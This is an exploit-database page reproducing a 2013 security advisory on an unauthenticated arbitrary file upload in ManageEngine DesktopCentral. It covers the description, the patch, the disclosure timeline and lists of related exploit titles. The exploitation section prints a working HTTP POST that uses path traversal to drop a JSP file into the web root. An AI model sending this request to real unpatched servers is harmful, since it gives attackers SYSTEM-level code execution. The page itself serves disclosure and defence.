Menu

Search for hundreds of thousands of exploits

"ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload"

Author

Exploit author

Security-Assessment.com

Platform

Exploit platform

jsp

Release date

Exploit published date

2013-11-18

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
(    , )     (, 
  .   `.' ) ('.    ', 
   ). , ('.   ( ) ( 
  (_,) .`), ) _ _, 
 /  _____/  / _  \    ____  ____   _____ 
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \ 
 /       \/   |    \\  \__(  <_> )  Y Y  \ 
/______  /\___|__  / \___  >____/|__|_|  / 
        \/         \/.-.    \/         \/:wq 
                    (x.0) 
                  '=.|w|.=' 
                  _='`"``=. 

                presents.. 

DesktopCentral Arbitrary File Upload Vulnerability
Affected versions: DesktopCentral versions < 80293

PDF: http://security-assessment.com/files/documents/advisory/DesktopCentral%20Arbitrary%20File%20Upload.pdf

+-----------+ 
|Description| 
+-----------+ 

ManageEngine DesktopCentral 8.0.0 build 80293 and below suffer from an arbitrary file upload vulnerability that can be 
leveraged to gain arbitrary code execution on the server. The code run on the server in this fashion will execute as 
NT-AUTHORITY\SYSTEM.
The problem exists in the AgentLogUploadServlet. This servlet takes input from HTTP POST and constructs an output file 
on the server without performing any sanitisation or even checking if the caller is authenticated. Due to the way the 
path is constructed it is possible to traverse to the application web root and create a script file that will be 
executed when called from a web browser.

+------------+ 
|Exploitation| 
+------------+ 

POST/agentLogUploader?computerName=DesktopCentral&domainName=webapps&
customerId=..&filename=test.jsp HTTP/1.1
Host: <desktopcentral>:8020
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: keep-alive
Content-Type: text/html;
Content-Length: 109

<HTML>
 <HEAD>
  <TITLE>Hello World</TITLE>
 </HEAD>
 <BODY>
  <H1>Hello World</H1>
 </BODY>
</HTML>

+----------+ 
| Solution | 
+----------+ 

Apply the patch supplied by the vendor (Patch 80293)

+-------------------+ 
|Disclosure Timeline| 
+-------------------+ 


20/10/2013  Vulnerability discovered, vendor notified.
25/10/2013  Vendor acknowledges issue
30/10/2013 - Vendor issues Patch 80293 that fixes the issue
09/11/2013  Exploit demonstrated at Kiwicon 7
18/11/2013  Advisory released.

+-----------------------------+ 
|About Security-Assessment.com| 
+-----------------------------+ 

Security-Assessment.com is a New Zealand based world 
leader in web application testing, network security 
and penetration testing. Security-Assessment.com 
services organisations across New Zealand, Australia, 
Asia Pacific, the United States and the United 
Kingdom. 

Security-Assessment.com is currently looking for skilled penetration 
testers. If you are interested, please email 'hr at security-assessment.com'
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)" webapps jsp max7253
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal" webapps jsp max7253
2019-09-16 "NetGain EM Plus 10.1.68 - Remote Command Execution" webapps jsp azams
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)" webapps jsp "Wietse Boonstra"
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
Release Date Title Type Platform Author
2016-12-09 "Splunk Enterprise 6.4.3 - Server-Side Request Forgery" webapps multiple Security-Assessment.com
2016-11-21 "Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)" dos windows Security-Assessment.com
2016-08-16 "Nagios Log Server 1.4.1 - Multiple Vulnerabilities" webapps php Security-Assessment.com
2016-08-16 "Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities" webapps php Security-Assessment.com
2016-08-16 "Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities" webapps php Security-Assessment.com
2016-06-27 "Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities" webapps php Security-Assessment.com
2016-06-27 "Panda Security (Multiple Products) - Local Privilege Escalation" local windows Security-Assessment.com
2016-06-06 "Nagios XI 5.2.7 - Multiple Vulnerabilities" webapps php Security-Assessment.com
2016-05-10 "Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities" dos linux Security-Assessment.com
2016-04-18 "pfSense Community Edition 2.2.6 - Multiple Vulnerabilities" webapps php Security-Assessment.com
2016-03-15 "Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities" webapps php Security-Assessment.com
2016-02-22 "BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities" webapps java Security-Assessment.com
2015-09-15 "Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities" webapps php Security-Assessment.com
2015-06-30 "WedgeOS 4.0.4 - Multiple Vulnerabilities" webapps jsp Security-Assessment.com
2015-06-30 "Watchguard XCS 10.0 - Multiple Vulnerabilities" webapps php Security-Assessment.com
2015-05-01 "TestDisk 6.14 - 'Check_OS2MB' Stack Buffer Overflow (PoC)" dos multiple Security-Assessment.com
2014-08-29 "F5 Big-IP - rsync Access" remote hardware Security-Assessment.com
2013-11-18 "ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload" webapps jsp Security-Assessment.com
2013-11-18 "Kaseya < 6.3.0.2 - Arbitrary File Upload" webapps asp Security-Assessment.com
2007-07-10 "TippingPoint IPS - Unicode Character Detection Bypass" remote windows Security-Assessment.com 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected